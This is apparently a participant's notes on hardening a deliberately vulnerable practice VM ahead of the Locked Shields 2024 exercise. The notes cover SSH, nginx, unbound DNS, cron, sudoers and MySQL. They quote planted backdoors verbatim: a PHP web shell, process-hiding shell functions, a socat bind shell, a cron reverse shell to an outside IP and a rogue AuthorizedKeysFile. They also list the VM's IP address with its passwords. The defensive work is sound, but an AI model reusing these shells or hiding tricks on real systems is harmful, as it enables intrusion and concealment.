# LS 2024 selection
### initial instructions
```txt
λ sshpass -p Admin1Admin1 ssh root@64.227.120.192
Last login: Fri Feb 2 08:01:16 2024 from 31.220.83.175
_ _ _ _____ _ _ _ _ ___ _ _
| | | | | |/ ____| | (_) | | | | |__ \| || |
| | ___ ___| | _____ __| | (___ | |__ _ ___| | __| |___ ) | || |_
| | / _ \ / __| |/ / _ \/ _` |\___ \| '_ \| |/ _ \ |/ _` / __| / /|__ _|
| |___| (_) | (__| < __/ (_| |____) | | | | | __/ | (_| \__ \/ /_ | |
|______\___/ \___|_|\_\___|\__,_|_____/|_| |_|_|\___|_|\__,_|___/____| |_|
Welcome to the very vulnerable VM, somewhat similar what we can expect at Locked
Shields.
There are few tasks for you:
- protect the VM preserving the following services in running (and secure)
state:
- web server
- ssh server: all users (including root) should be allowed to login
- dns server
- identify as many vulnerabilities in the VM as possible
- all passwords are set to `Admin1Admin1`. You are encouraged to change them.
- write down the vulnerabilities with short explanation what this vulnerability
can cause
- write ansible playbook (preferred) or a bash script, which will mitigate the
vulnerabilities and will still serve the web, ssh and dns services
- share the "documentation" with description of identified vulnerabilities and
code to lockedshields@ssrd.io. Github links preferred.
Some notes:
- the VM will be forcefully shutdown so make changes permanent
- root user should be allowed to login from 138.68.128.150 with the following ssh
keys:
- ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC55vv1HAHwUOxZ+Zn4IcswclUkLEP2eA0tJG3BwE0pO
- ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINKOliO5L0TA84lclwmsdu+Wcm/r3LDQH9G2jICZ3ECC
- defense (and documentation, either through code or description) is more
important than finding vulnerabilities
- you do not need to go into details explaining vulnerabilities
- we will share the planted vulnerabilities afterwards
```
### initial ps
```bash
root@ls-2024-9:~# ps auxf
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 2 0.0 0.0 0 0 ? S 07:59 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [rcu_gp]
root 4 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [rcu_par_gp]
root 5 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [slub_flushwq]
root 6 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [netns]
root 7 0.0 0.0 0 0 ? I 07:59 0:00 \_ [kworker/0:0-cgroup_destroy]
root 8 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kworker/0:0H-events_highpri]
root 9 0.1 0.0 0 0 ? I 07:59 0:00 \_ [kworker/u2:0-ext4-rsv-conversion]
root 10 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [mm_percpu_wq]
root 11 0.0 0.0 0 0 ? S 07:59 0:00 \_ [rcu_tasks_rude_]
root 12 0.0 0.0 0 0 ? S 07:59 0:00 \_ [rcu_tasks_trace]
root 13 0.0 0.0 0 0 ? S 07:59 0:00 \_ [ksoftirqd/0]
root 14 0.2 0.0 0 0 ? I 07:59 0:00 \_ [rcu_sched]
root 15 0.0 0.0 0 0 ? S 07:59 0:00 \_ [migration/0]
root 16 0.0 0.0 0 0 ? S 07:59 0:00 \_ [idle_inject/0]
root 17 0.1 0.0 0 0 ? I 07:59 0:00 \_ [kworker/0:1-cgroup_destroy]
root 18 0.0 0.0 0 0 ? S 07:59 0:00 \_ [cpuhp/0]
root 19 0.0 0.0 0 0 ? S 07:59 0:00 \_ [kdevtmpfs]
root 20 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [inet_frag_wq]
root 21 0.0 0.0 0 0 ? S 07:59 0:00 \_ [kauditd]
root 22 0.0 0.0 0 0 ? S 07:59 0:00 \_ [khungtaskd]
root 23 0.0 0.0 0 0 ? S 07:59 0:00 \_ [oom_reaper]
root 24 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [writeback]
root 25 0.0 0.0 0 0 ? S 07:59 0:00 \_ [kcompactd0]
root 26 0.0 0.0 0 0 ? SN 07:59 0:00 \_ [ksmd]
root 27 0.0 0.0 0 0 ? SN 07:59 0:00 \_ [khugepaged]
root 73 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kintegrityd]
root 74 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kblockd]
root 75 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [blkcg_punt_bio]
root 76 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [tpm_dev_wq]
root 77 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [ata_sff]
root 78 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [md]
root 79 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [edac-poller]
root 80 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [devfreq_wq]
root 81 0.0 0.0 0 0 ? S 07:59 0:00 \_ [watchdogd]
root 82 0.0 0.0 0 0 ? I 07:59 0:00 \_ [kworker/u2:1-ext4-rsv-conversion]
root 83 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kworker/0:1H-kblockd]
root 85 0.0 0.0 0 0 ? S 07:59 0:00 \_ [kswapd0]
root 86 0.0 0.0 0 0 ? S 07:59 0:00 \_ [ecryptfs-kthrea]
root 88 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kthrotld]
root 89 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [acpi_thermal_pm]
root 90 0.0 0.0 0 0 ? I 07:59 0:00 \_ [kworker/u2:2-ext4-rsv-conversion]
root 91 0.0 0.0 0 0 ? S 07:59 0:00 \_ [scsi_eh_0]
root 92 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [scsi_tmf_0]
root 93 0.0 0.0 0 0 ? S 07:59 0:00 \_ [scsi_eh_1]
root 94 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [scsi_tmf_1]
root 95 0.0 0.0 0 0 ? I 07:59 0:00 \_ [kworker/u2:3-events_unbound]
root 96 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [vfio-irqfd-clea]
root 97 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [mld]
root 98 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [ipv6_addrconf]
root 107 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kstrp]
root 110 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [zswap-shrink]
root 111 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kworker/u3:0]
root 116 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [charger_manager]
root 154 0.0 0.0 0 0 ? S 07:59 0:00 \_ [scsi_eh_2]
root 155 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [cryptd]
root 156 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [scsi_tmf_2]
root 214 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [raid5wq]
root 258 0.0 0.0 0 0 ? S 07:59 0:00 \_ [jbd2/vda1-8]
root 259 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [ext4-rsv-conver]
root 353 0.0 0.0 0 0 ? I 07:59 0:00 \_ [kworker/u2:4-flush-252:0]
root 357 0.0 0.0 0 0 ? I 07:59 0:00 \_ [kworker/0:2-events]
root 362 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kaluad]
root 363 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kmpath_rdacd]
root 364 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kmpathd]
root 365 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kmpath_handlerd]
root 401 0.0 0.0 0 0 ? I 07:59 0:00 \_ [kworker/u2:5-ext4-rsv-conversion]
root 404 0.0 0.0 0 0 ? I 07:59 0:00 \_ [kworker/u2:6-flush-252:0]
root 816 0.0 0.0 0 0 ? I 07:59 0:00 \_ [kworker/0:3-events]
root 1209 0.0 0.0 0 0 ? I 07:59 0:00 \_ [kworker/u2:7]
root 1 0.9 1.1 100872 11332 ? Ss 07:59 0:02 /sbin/init
root 324 0.0 1.4 31768 14440 ? S<s 07:59 0:00 /lib/systemd/systemd-journald
root 366 0.0 2.7 289316 27100 ? SLsl 07:59 0:00 /sbin/multipathd -d -s
root 369 0.0 0.6 22780 6284 ? Ss 07:59 0:00 /lib/systemd/systemd-udevd
systemd+ 436 0.0 0.8 16252 8436 ? Ss 07:59 0:00 /lib/systemd/systemd-networkd
systemd+ 442 0.0 0.6 89360 6476 ? Ssl 07:59 0:00 /lib/systemd/systemd-timesyncd
root 459 0.0 0.0 1088 52 ? S 07:59 0:00 nftablesd
message+ 521 0.0 0.4 8560 4508 ? Ss 07:59 0:00 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 528 0.0 1.9 33108 19412 ? Ss 07:59 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 529 0.0 2.8 220240 28048 ? Ss 07:59 0:00 php-fpm: master process (/etc/php/8.1/fpm/php-fpm.conf)
www-data 591 0.0 1.4 220680 14560 ? S 07:59 0:00 \_ php-fpm: pool www
www-data 592 0.0 1.0 220680 10260 ? S 07:59 0:00 \_ php-fpm: pool www
syslog 532 0.0 0.5 222404 5352 ? Ssl 07:59 0:00 /usr/sbin/rsyslogd -n -iNONE
root 534 1.5 2.7 1245220 27752 ? Ssl 07:59 0:03 /usr/lib/snapd/snapd
root 535 0.0 0.6 14908 6392 ? Ss 07:59 0:00 /lib/systemd/systemd-logind
unbound 575 0.0 1.6 30168 16312 ? Ss 07:59 0:00 /usr/sbin/unbound -d -p
mysql 608 1.5 39.4 1322632 391232 ? Ssl 07:59 0:03 /usr/sbin/mysqld --skip-grant-tables
root 638 0.0 0.2 55936 2456 ? Ss 07:59 0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data 639 0.0 0.6 56552 6084 ? S 07:59 0:00 \_ nginx: worker process
root 815 0.0 0.4 1230260 4348 ? Ssl 07:59 0:00 /opt/digitalocean/bin/droplet-agent
root 820 0.0 0.2 7288 2820 ? Ss 07:59 0:00 /usr/sbin/cron -f -P
daemon 834 0.0 0.1 3864 1236 ? Ss 07:59 0:00 /usr/sbin/atd -f
root 835 0.0 0.4 9496 4336 ? Ss 07:59 0:00 /usr/sbin/fwknopd
root 843 0.0 0.1 6220 1164 ttyS0 Ss+ 07:59 0:00 /sbin/agetty -o -p -- \u --keep-baud 115200,57600,38400,9600 ttyS0 vt220
root 845 0.0 0.1 6176 1060 tty1 Ss+ 07:59 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 860 0.0 0.9 15432 9408 ? Ss 07:59 0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root 1660 0.0 1.0 16000 10008 ? Ss 08:01 0:00 \_ sshd: root@pts/0
root 1667 0.0 0.4 5684 4952 pts/0 Ss 08:01 0:00 \_ -bash
root 1679 0.0 0.3 7208 2980 pts/0 R+ 08:03 0:00 \_ ps auxf
root 978 0.0 0.2 9688 2416 ? Ss 07:59 0:00 /usr/sbin/xinetd -pidfile /run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6
root 1147 0.0 0.2 82724 2112 ? Ssl 07:59 0:00 /usr/bin/conmon --api-version 1 -c 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -u 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -r /usr/bin/crun -b /var/lib/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata -p /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/pidfile -n 2048 --exit-dir /run/libpod/exits --full-attach -s -l journald --log-level warning --runtime-arg --log-format=json --runtime-arg --log --runtime-arg=/run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/oci-log --conmon-pidfile /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/conmon.pid --exit-command /usr/bin/podman --exit-command-arg --root --exit-command-arg /var/lib/containers/storage --exit-command-arg --runroot --exit-command-arg /run/containers/storage --exit-command-arg --log-level --exit-command-arg warning --exit-command-arg --cgroup-manager --exit-command-arg systemd --exit-command-arg --tmpdir --exit-command-arg /run/libpod --exit-command-arg --runtime --exit-command-arg crun --exit-command-arg --events-backend --exit-command-arg journald --exit-command-arg container --exit-command-arg cleanup --exit-command-arg --rm --exit-command-arg 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6
root 1151 0.0 2.4 82904 24156 ? Ss 07:59 0:00 \_ apache2 -DFOREGROUND
www-data 1202 0.0 0.9 83212 9388 ? S 07:59 0:00 \_ apache2 -DFOREGROUND
www-data 1203 0.0 0.9 83212 9432 ? S 07:59 0:00 \_ apache2 -DFOREGROUND
www-data 1204 0.0 0.9 83212 9432 ? S 07:59 0:00 \_ apache2 -DFOREGROUND
www-data 1205 0.0 0.9 83212 9432 ? S 07:59 0:00 \_ apache2 -DFOREGROUND
www-data 1206 0.0 0.9 83212 9436 ? S 07:59 0:00 \_ apache2 -DFOREGROUND
root 1651 0.0 0.4 41224 4792 ? Ss 07:59 0:00 /usr/lib/postfix/sbin/master -w
postfix 1654 0.0 0.7 41564 7340 ? S 07:59 0:00 \_ pickup -l -t unix -u -c
postfix 1655 0.0 0.7 41608 7392 ? S 07:59 0:00 \_ qmgr -l -t unix -u
postfix 1662 0.0 1.3 48160 13808 ? S 08:01 0:00 \_ smtpd -n smtp -t inet -u -c -o stress= -s 2
postfix 1664 0.0 1.2 47332 12188 ? S 08:01 0:00 \_ tlsmgr -l -t unix -u -c
postfix 1665 0.0 0.6 41560 6876 ? S 08:01 0:00 \_ anvil -l -t unix -u -c
postfix 1666 0.0 0.7 41572 7080 ? S 08:01 0:00 \_ trivial-rewrite -n rewrite -t unix -u -c
```
### initially change root password
```bash
sshpass -p lockedshields2024 ssh root@64.227.120.192
```
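Root is handled above; the instructions also say every other account still uses `Admin1Admin1`, so it is worth rotating the rest as well. A hedged sketch (the UID cutoff and the random-password approach are my choices, not something from the box):
```bash
# Rotate passwords for all regular (UID >= 1000) accounts, skipping the nobody account.
while IFS=: read -r user _ uid _; do
  if [ "$uid" -ge 1000 ] && [ "$user" != "nobody" ]; then
    newpass=$(openssl rand -base64 18)
    echo "${user}:${newpass}" | chpasswd
    echo "new password for ${user}: ${newpass}"   # record these somewhere safe
  fi
done < /etc/passwd
```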
### initial nmap scan
```bash
λ sudo nmap -sV -sC 64.227.120.192
[sudo] password for spagnologasper:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-02 09:08 CET
Nmap scan report for 64.227.120.192
Host is up (0.033s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 d9:de:f7:4d:0f:31:0e:82:3a:ad:c5:d4:c4:91:00:9a (ECDSA)
|_ 256 b6:45:01:4e:3c:d7:b9:78:05:9d:4d:58:f7:1c:f1:c3 (ED25519)
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=ls-2024-9
| Subject Alternative Name: DNS:ls-2024-9
| Not valid before: 2024-02-01T14:36:57
|_Not valid after: 2034-01-29T14:36:57
|_smtp-commands: ls-2024-9, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_ssl-date: TLS randomness does not represent time
53/tcp open domain Unbound 1.13.1
| dns-nsid:
| id.server: ls-2024-9
|_ bind.version: unbound 1.13.1
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
| tls-nextprotoneg:
|_ http/1.1
| tls-alpn:
|_ http/1.1
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=ls-2024-9
| Subject Alternative Name: DNS:ls-2024-9
| Not valid before: 2024-02-01T14:36:57
|_Not valid after: 2034-01-29T14:36:57
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
Service Info: Host: ls-2024-9; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.82 seconds
```
### Web server
```
server {
listen 443 ssl default_server;
listen [::]:443 ssl default_server;
#
# Note: You should disable gzip for SSL traffic.
# See: https://bugs.debian.org/773332
#
# Read up on ssl_ciphers to ensure a secure configuration.
# See: https://bugs.debian.org/765782
#
# Self signed certs generated by the ssl-cert package
# Don't use them in a production server!
#
include snippets/snakeoil.conf;
root /var/www/html;
# Add index.php to the list if you are using PHP
index index.html index.htm index.php;
listen 80 default_server;
server_name _;
location /2048/ {
proxy_pass http://localhost:8018/;
proxy_set_header Host $host;
}
location / {
# First attempt to serve request as file, then
# as directory, then fall back to displaying a 404.
try_files $uri $uri/ =404;
}
# pass PHP scripts to FastCGI server
#
location ~ \.php$ {
include snippets/fastcgi-php.conf;
# # With php-fpm (or other unix sockets):
fastcgi_pass unix:/run/php/php-fpm.sock;
# # With php-cgi (or other tcp sockets):
# fastcgi_pass 127.0.0.1:9000;
}
# deny access to .htaccess files, if Apache's document root
# concurs with nginx's one
#
#location ~ /\.ht {
# deny all;
#}
}
```
The server serves files from `/var/www/html` and proxies requests for `/2048/` to `http://localhost:8018/`, where a simple game is running.
Let's enable XSS protection headers in the nginx configuration.
```bash
location /2048/ {
proxy_pass http://localhost:8018/;
proxy_set_header Host $host;
# Add security headers
add_header X-Frame-Options "SAMEORIGIN";
add_header X-Content-Type-Options "nosniff";
add_header X-XSS-Protection "1; mode=block";
}
```
And deny access to all dotfiles:
```bash
location ~ /\. {
deny all;
}
```
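After any nginx config change, validate and reload so the web service stays up (a small sketch):
```bash
nginx -t && systemctl reload nginx
```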
The service on port 8018 is run by a `conmon` process:
```bash
root@ls-2024-9:~# sudo lsof -i :8018
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
conmon 1147 root 5u IPv4 19949 0t0 TCP *:8018 (LISTEN)
root 1147 0.0 0.2 82724 2112 ? Ssl 07:59 0:00 /usr/bin/conmon --api-version 1 -c 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -u 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -r /usr/bin/crun -b /var/lib/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata -p /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/pidfile -n 2048 --exit-dir /run/libpod/exits --full-attach -s -l journald --log-level warning --runtime-arg --log-format=json --runtime-arg --log --runtime-arg=/run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/oci-log --conmon-pidfile /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/conmon.pid --exit-command /usr/bin/podman --exit-command-arg --root --exit-command-arg /var/lib/containers/storage --exit-command-arg --runroot --exit-command-arg /run/containers/storage --exit-command-arg --log-level --exit-command-arg warning --exit-command-arg --cgroup-manager --exit-command-arg systemd --exit-command-arg --tmpdir --exit-command-arg /run/libpod --exit-command-arg --runtime --exit-command-arg crun --exit-command-arg --events-backend --exit-command-arg journald --exit-command-arg container --exit-command-arg cleanup --exit-command-arg --rm --exit-command-arg 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6
```
It is a podman container.
```bash
root@ls-2024-9:~# podman ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
4d05d4a1a404 docker.io/nejec/2048:latest apache2-foregroun... 2 hours ago Up 2 hours ago 0.0.0.0:8018->22/tcp 2048
root@ls-2024-9:~#
```
Entering the container, we find a PHP web shell (`shell.php`):
```bash
root@ls-2024-9:~# podman exec -it 4d05d4a1a404 bash
root@4d05d4a1a404:/var/www/html# ls
app.js assets index.html manifest.json service-worker.js shell.php style.css
root@4d05d4a1a404:/var/www/html# cat shell.php
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>CMD</title>
<style type="text/css">
body {
background: black;
font-family: courier,arial;
color: white;
}
</style>
</head>
<body>
<br/><br/><br/>
<center>
<form method="POST">
<input type="text" name="cmd" placeholder="cmd" size=100/>
<input type="submit" value="exec"/>
</form>
</center>
<br/><br/><br/>
<?php
if(isset($_POST['cmd'])){
echo nl2br(shell_exec($_POST['cmd'].' 2>&1'));
}
?>
</body>
root@4d05d4a1a404:/var/www/html#
```
Let's remove the file now:
```bash
podman exec -it 4d05d4a1a404 rm -rf /var/www/html/shell.php
```
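Note that `shell.php` came from the `docker.io/nejec/2048` image, so the deletion lives in this container's writable layer: it survives container restarts, but the file would reappear if the container were re-created from the image. A quick check that it is gone (sketch):
```bash
podman exec 2048 ls -la /var/www/html   # shell.php should no longer be listed
```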
### Already f-up something
Shell function overrides (spotted in the `typeset` output) that filter `netstat`, `ps`, `pstree`, and `ss` so anything mentioning port 8953, port 2227, `socat`, or `screen` is hidden. Time to delete them:
```bash
netstat ()
{
command netstat "$@" | grep -Fv -e 8953 -e socat -e 2227 -e screen
}
ps ()
{
command ps "$@" | grep -Fv -e 8953 -e socat -e 2227 -e screen
}
pstree ()
{
command pstree "$@" | grep -Fv -e socat -e 2227 -e screen
}
quote ()
{
local quoted=${1//\'/\'\\\'\'};
printf "'%s'" "$quoted"
}
quote_readline ()
{
local ret;
_quote_readline_by_ref "$1" ret;
printf %s "$ret"
}
ss ()
{
command ss "$@" | grep -Fv -e 8953 -e socat -e 2227 -e screen
}
```
Tried:
```bash
sudo grep -E "typeset|netstat|ps|pstree|ss" /etc/profile
grep -E "typeset|netstat|ps|pstree|ss" ~/.bashrc ~/.bash_profile
grep -rE "typeset|netstat|ps|pstree|ss" ~ /etc
```
No luck.
Let's try it differently:
```bash
find / -path /proc -prune -o -type f -print0 | xargs -0 grep -E "typeset"
```
No sign of where they are defined, so just unset them:
```
unset -f netstat ps pstree ss
```
And kill the hidden processes. First, find the PID listening on port 2227:
```bash
root@ls-2024-9:/etc/ssh# ss -ltnp | grep ':2227' | awk '{print $6}' | sed 's/.*pid=//;s/,.*//'
1673
```
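Kill the listener and its parent `screen` session (a sketch; the PID comes from the lookup above, and the `pkill` patterns are based on the process list shown below):
```bash
# Kill the socat listener on :2227 and the detached screen session that spawned it.
kill -9 1673 2>/dev/null
pkill -9 -f 'socat TCP6-LISTEN:2227' || true
pkill -9 -f 'SCREEN -d -m /usr/bin/socat' || true
```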
After some time the socat backdoor listener is back:
```bash
root 1672 0.0 0.1 4172 1952 ? Ss 08:01 0:00 SCREEN -d -m /usr/bin/socat TCP6-LISTEN:2227,reuseaddr,fork EXEC:/usr/bin/bash,stderr
root 1673 0.0 0.0 10292 900 pts/1 Ss+ 08:01 0:00 \_ /usr/bin/socat TCP6-LISTEN:2227,reuseaddr,fork EXEC:/usr/bin/bash,stderr
```
Killed it and I hope it does not come back.
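Since it already respawned once, it is worth hunting for whatever starts it; a hedged sketch of the usual places to look (these paths are the standard persistence spots, not confirmed findings):
```bash
# Search common persistence locations for references to the listener.
grep -rn -e socat -e 2227 \
  /etc/systemd /etc/cron* /etc/rc.local /etc/profile.d /root/.bashrc /var/spool/cron 2>/dev/null
systemctl list-timers --all   # look for suspicious timers too
```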
### e bit in pexec
```bash
root@ls-2024-9:/etc/ssh# lsattr /usr/bin/pexec
--------------e------- /usr/bin/pexec
```
This should not be a problem: the `e` flag just means the file uses extents (a normal ext4 attribute), and the binary is not setuid.
### SSH
Let's disallow empty-password logins and password logins altogether.
```bash
PermitEmptyPasswords yes -> no
PasswordAuthentication no -> no ? (this is weird because I was able to log in with a password)
```
And I was still able to log in using a password.
Nooooooo:
```bash
root@ls-2024-9:/etc/ssh/sshd_config.d# cat 50-cloud-init.conf
PasswordAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2 /etc/ssh/ssh_host_echd_key
```
Pointing `AuthorizedKeysFile` at an SSH host key file is almost certainly a backdoor: whoever holds the matching private key can log in as any user. Let's remove all the other definitions and keep only
```bash
AuthorizedKeysFile .ssh/authorized_keys
```
in the sshd config.
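Putting the SSH hardening together, here is a hedged sketch of the intended end state (the exact directive set, the `prohibit-password` choice, and appending the two keys from the task instructions are my assumptions, not a transcript of what was run):
```bash
# Intended final values in /etc/ssh/sshd_config (edit in place rather than append,
# since sshd honours the first occurrence of each directive):
#   PermitRootLogin prohibit-password
#   PermitEmptyPasswords no
#   PasswordAuthentication no
#   AuthorizedKeysFile .ssh/authorized_keys

# Drop the rogue drop-in and install the two keys required by the task instructions.
rm -f /etc/ssh/sshd_config.d/50-cloud-init.conf
cat >> /root/.ssh/authorized_keys <<'EOF'
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC55vv1HAHwUOxZ+Zn4IcswclUkLEP2eA0tJG3BwE0pO
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINKOliO5L0TA84lclwmsdu+Wcm/r3LDQH9G2jICZ3ECC
EOF

# Validate the config before restarting so we do not lock ourselves out.
sshd -t && systemctl restart sshd
```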
Now we can ssh in with `ssh ls2024_prep`, using this entry in `~/.ssh/config`:
```config
Host ls2024_prep
HostName 64.227.120.192
User root
Port 22
IdentityFile ~/.ssh/keys/id_ed25519_ls2024_prep
```
### DNS
The problem here is that remote control is enabled, bound to every interface, and does not require certificates, so anyone who can reach port 8953 can drive the resolver with `unbound-control` (and potentially escalate from there to a root shell).
```txt
root@ls-2024-9:/etc/unbound/unbound.conf.d# cat /etc/unbound/unbound.conf.d/remote-control.conf
# default unbound control
remote-control:
control-enable: yes
control-interface: ::0
control-use-cert: no
```
Let's disable remote control completely and restart the service.
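A sketch of what the drop-in looks like after the change, plus a config check before the restart below (the heredoc rewrite is my choice; editing the file by hand is equivalent):
```bash
# Disable unbound's remote control interface entirely (sketch).
cat > /etc/unbound/unbound.conf.d/remote-control.conf <<'EOF'
remote-control:
    control-enable: no
EOF
unbound-checkconf   # sanity-check the full config before restarting
```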
```bash
root@ls-2024-9:/etc/unbound/unbound.conf.d# systemctl restart unbound
```
This is all I found suspicious in the DNS configuration.
### Cron
Suspicious cron jobs:
```bash
root@ls-2024-9:/etc/cron.d# cat e2scrub_all
MAILTO=""
30 3 * * 0 root test -e /run/systemd/system || SERVICE_MODE=1 /usr/lib/x86_64-linux-gnu/e2fsprogs/e2scrub_all_cron
10 3 * * * root test -e /run/systemd/system || SERVICE_MODE=1 /sbin/e2scrub_all -A -r
5-55/10 * * * * root test -e /run/systemd/system || SERVICE_MODE=1 /sbin/xfsscrub_all -A -r
```
The third entry calls a script that contains a reverse shell:
```bash
root@ls-2024-9:/etc/cron.d# cat /sbin/xfsscrub_all
#!/bin/bash
/bin/bash -i >& /dev/tcp/138.68.128.150/8080 || true >> /dev/null 0>&1 2>&1
```
Remove the entry from the cron file, delete the script, and restart the cron service.
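A hedged sketch of the cleanup itself (the `sed` expression is mine; editing `/etc/cron.d/e2scrub_all` by hand works just as well):
```bash
# Drop the malicious cron entry and delete the reverse-shell script it calls.
sed -i '/xfsscrub_all/d' /etc/cron.d/e2scrub_all
rm -f /sbin/xfsscrub_all
```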
```bash
root@ls-2024-9:/etc/cron.d# systemctl restart cron
```
I also checked this one; it is safe:
```bash
root@ls-2024-9:/etc/cron.d# cat sysstat
# The first element of the path is a directory where the debian-sa1
# script is located
PATH=/usr/lib/sysstat:/usr/sbin:/usr/sbin:/usr/bin:/sbin:/bin
# Activity reports every 10 minutes everyday
5-55/10 * * * * root command -v debian-sa1 > /dev/null && debian-sa1 1 1
# Additional run at 23:59 to rotate the statistics file
59 23 * * * root command -v debian-sa1 > /dev/null && debian-sa1 60 2
```
### Sudoers
```bash
root@ls-2024-9:/etc/sudoers.d# cat 90-cloud-init-users
# Created by cloud-init v. 22.4.2-0ubuntu0~22.04.1 on Thu, 01 Feb 2024 14:23:09 +0000
# User rules for root
root ALL=(ALL) NOPASSWD:ALL
```
This rule lets the root account run any command, as any user, without a password. Let's comment it out.
```bash
visudo -f /etc/sudoers.d/90-cloud-init-users
```
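After commenting the rule out, a quick syntax check avoids breaking sudo entirely (sketch):
```bash
visudo -c   # parse-checks /etc/sudoers and the files under /etc/sudoers.d
```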
### Mysql database
Pretty much safe at first glance: the database is not exposed to the internet (confirmed by the `nmap` scan) and only listens locally.
```bash
bind-address = 127.0.0.1
mysqlx-bind-address = 127.0.0.1
```
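To double-check that it really only listens on loopback (a quick sketch):
```bash
ss -ltnp | grep -E ':(3306|33060)'   # mysqld (3306) and mysqlx (33060) should be bound to 127.0.0.1
```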
BUT... when we look at the `ps` output, we notice:
```bash
mysql 608 0.8 36.8 1324960 366156 ? Ssl 07:59 1:05 /usr/sbin/mysqld --skip-grant-tables
```
- `--skip-grant-tables`: this option causes the server to start without using the privilege system at all, which means anyone who can reach the server can connect without a password and with full privileges.
```bash
root@ls-2024-9:/etc/systemd/system# systemctl status mysql
● mysql.service - MySQL Community Server
Loaded: loaded (/lib/systemd/system/mysql.service; enabled; vendor preset: enabled)
Active: active (running) since Fri 2024-02-02 07:59:21 UTC; 2h 15min ago
